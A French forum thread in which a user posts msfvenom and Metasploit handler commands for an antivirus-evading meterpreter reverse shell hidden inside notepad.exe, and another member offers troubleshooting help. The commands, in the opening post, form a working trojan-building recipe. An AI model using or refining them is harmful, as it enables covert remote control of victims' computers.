Auteur Sujet: Problème d'encoding payload  (Lu 2192 fois)

0 Membres et 1 Invité sur ce sujet

Hors ligne Zarixx

  • Nouvel inscrit
  • Messages: 3
  • +0/-0
Problème d'encoding payload
« le: 09 mai 2017 à 07:47:51 »
Bonjour, je suis confronté à un problème, j'essaye d'encoder mon payload windows/meterpreter/reverse_tcp avec comme template notepad.exe suite à la commande:

msfvenom -a x86 --platforms windows -x notepad.exe -f exe -o /root/test.exe -e x86/shikata_ga_nai -p windows/meterpreter/reverse_tcp LHOST=192.168.1.34 LPORT=4444

Cette commande me crée bien un exécutable qui n'est pas détecté par mon AV mais quand je lance sur la machine cible, aucunes sessions meterpreter s'ouvrent dans metasploit. Sachant que dans msf j'ai bien fait :

msf: use exploit/multi/handler
msf: set LHOST 192.168.31.34
msf: set LPORT 4444
msf: set PAYLOAD windows/meterpreter/reverse_tcp
msf: exploit

et la aucunes sessions s'ouvrent lors du lancement du test.exe sur la machine cible.

Merci d'avance de votre réponse, en espérant avoir été clair.

Hors ligne Easy_hax

  • Nouvel inscrit
  • Messages: 3
  • +0/-0
Re : Problème d'encoding payload
« Réponse #1 le: 09 mai 2017 à 13:06:58 »
Tu testes le payload sur un ordinateur connecté à la même box que toi ?
Tu as vérifié ton IP local ?
Tu as essayé un autre template ?
Easy_hax

Hors ligne Zarixx

  • Nouvel inscrit
  • Messages: 3
  • +0/-0
Re : Problème d'encoding payload
« Réponse #2 le: 09 mai 2017 à 16:50:40 »
J'encode le payload sur ma machine virtuelle, et je le transfère sur ma machine (windows10). Sans encoding le payload fonctionne mais est détectable par mon antivirus, donc je doute que ce soit un problème d'ip. J'ai également essayé avec paint comme template et le résultat est le même.

Hors ligne Easy_hax

  • Nouvel inscrit
  • Messages: 3
  • +0/-0
Re : Problème d'encoding payload
« Réponse #3 le: 09 mai 2017 à 19:44:43 »
L'architecture du payload est elle la même que celle du template ?
Je t'envoie un MP pour une aide plus ciblé.